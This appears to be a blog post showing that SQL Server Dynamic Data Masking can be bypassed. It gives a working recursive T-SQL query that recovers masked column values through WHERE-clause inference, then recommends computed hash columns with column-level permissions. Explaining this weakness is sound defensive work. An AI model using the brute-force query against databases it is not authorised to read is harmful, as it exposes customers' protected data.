Dynamic data masking is a neat new feature in recent SQL Server versions that allows you to protect sensitive information from non-privileged users by masking it. But using a brute-force guessing attack, even a non-privileged user can guess the contents of a masked column. And if you’re on SQL Server 2014 or earlier, you won’t have the option of using data masking at all.
How to set up dynamic data masking
Here’s the basic setup for a table with some sensitive data.
CREATE TABLE dbo.SensitiveStuff ( ID int NOT NULL, CustomerName varchar(100) NOT NULL, CONSTRAINT PK_SensitiveStuff PRIMARY KEY CLUSTERED (ID) ); --- We'll allow Trevor, our low-privilege user to read --- the contents, but we'll apply a mask, so he can't --- see the plaintext: GRANT SELECT ON dbo.SensitiveStuff TO trevor; --- Here's the masking: ALTER TABLE dbo.SensitiveStuff ALTER COLUMN CustomerName ADD MASKED WITH (FUNCTION = 'default()'); --- And some data to play with: INSERT INTO dbo.SensitiveStuff (CustomerName) VALUES ('Customer name goes here.');
Now, if we try to connect as Trevor…
EXECUTE AS USER='trevor'; SELECT CustomerName FROM dbo.SensitiveStuff; REVERT;
… all we see of the masked data is:
CustomerName ------------ xxxx
That’s the idea. If you have a front-end reporting tool like SSRS or Power BI, this might be sufficient for you.
… and how to bypass it
Let’s apply a mischievous mentality – how could we go about cracking this?
SELECT COUNT(*) AS xxx_exists FROM dbo.SensitiveStuff WHERE CustomerName LIKE 'xxx%'; SELECT COUNT(*) AS cust_exists FROM dbo.SensitiveStuff WHERE CustomerName LIKE 'Cust%';
xxx_exists ---------- 0
cust_exits ---------- 1
You see where I’m going with this? The WHERE clause has to match unmasked data in order to make anything in the database work – joins, filters, etc. We can exploit this by trying every permutation of every value you could fit in the column.
Long story short, here’s how I could go about trying to brute-force the contents of the column: First, find out how long the value is by checking WHERE LEN(CustomerName)=@x for each incrementing value of @x until you hit a value.
Next, try to see, character by character, if you can build the string.
.. and so on.
The recursive common table equivalent of the above looks something like this:
--- Declaring the row ID (@id) DECLARE @id int=1, --- ... and the column's declared maximum length (@maxlen): @maxlen int=(SELECT max_length FROM sys.columns WHERE [object_id]=OBJECT_ID('dbo.SensitiveStuff') AND [name]='CustomerName'); --- Every conceivable CHAR(): --- --- Loop through every character code, from 1 to 255: WITH ch AS ( SELECT 1 AS i, CHAR(1) AS ch UNION ALL SELECT i+1, CHAR(i+1) AS ch FROM ch WHERE i<255), --- Now, brute-force the length of the string: --- --- Try every length, from 0 to the column's declared --- maximum length (@maxlen) until we find the length: l AS ( SELECT -1 AS stringlen, CAST(NULL AS bit) AS marker UNION ALL SELECT stringlen+1, x.marker FROM l OUTER APPLY ( SELECT CAST(1 AS bit) AS marker FROM dbo.SensitiveStuff WHERE ID=@id AND LEN(CustomerName)=stringlen+1 ) AS x WHERE l.stringlen<@maxlen AND l.marker IS NULL), --- Finally, brute-force the string value, one character at a time: --- --- For each offset in the string, try every character. So, --- for a 24-character string, this will result in a little --- more than 6000 iterations. s AS ( SELECT 0 AS offset, CAST('' AS varchar(max)) AS string UNION ALL SELECT s.offset+1, CAST(s.string+ch.ch AS varchar(max)) AS string FROM s CROSS JOIN ch CROSS APPLY ( SELECT CAST(1 AS bit) AS marker FROM dbo.SensitiveStuff WHERE ID=@id AND CAST(LEFT(CustomerName, s.offset+1) AS varbinary(max))=CAST(s.string+ch.ch AS varbinary(max)) ) AS x WHERE s.offset<(SELECT stringlen FROM l WHERE marker IS NOT NULL)) --- and here's the result: SELECT TOP (1) string FROM s ORDER BY string DESC OPTION (MAXRECURSION 0);
If you want better performance, you can add interval-halving/bisection logic to arrive faster at your results, but I didn’t want to bloat the example code.
With any significant data volume, you would obviously have to dramatically re-write this query, but the idea is the same: Exploiting the fact that the filter in the WHERE clause is applied to the unmasked column value. Microsoft also acknowledges this in the documentation.
Like the name implies, Dynamic Data Masking should perhaps be considered a graphical interface feature, much like the **** masking your password when you log on to a web page, not really a proper security feature that would protect you against data theft.
An alternative masking solution
In closing, I would offer a different solution to data masking, one that also works with older versions of SQL Server:
- Add a computed column that does the masking. Hashing is great for some purposes, but you may want to roll your own text string logic for visual reports and things.
- Then grant column-level permissions to your security principals, allowing them to read only the masked and non-sensitive columns in the table.
CREATE TABLE dbo.SensitiveStuff ( ID int NOT NULL, CustomerName varchar(100) NOT NULL, --- Here's the computed column: Customer_masked AS HASHBYTES('SHA2_256', CustomerName), CONSTRAINT PK_SensitiveStuff PRIMARY KEY CLUSTERED (ID) ); --- Assign column-level permissions GRANT SELECT ON dbo.SensitiveStuff(ID, Customer_masked) TO trevor;
Now, when Trevor wants to read from the table, he’ll get a permission error when he tries to read the CustomerName column, but he can see the hashed customer name in the Customer_masked column.
It’s not precisely the same functionality as Dynamic Data Masking (because you need to assign different column names depending on if you want the masked/unmasked data), but it allows you to set up a security model where some principals have access to masked data and others can see the plain value.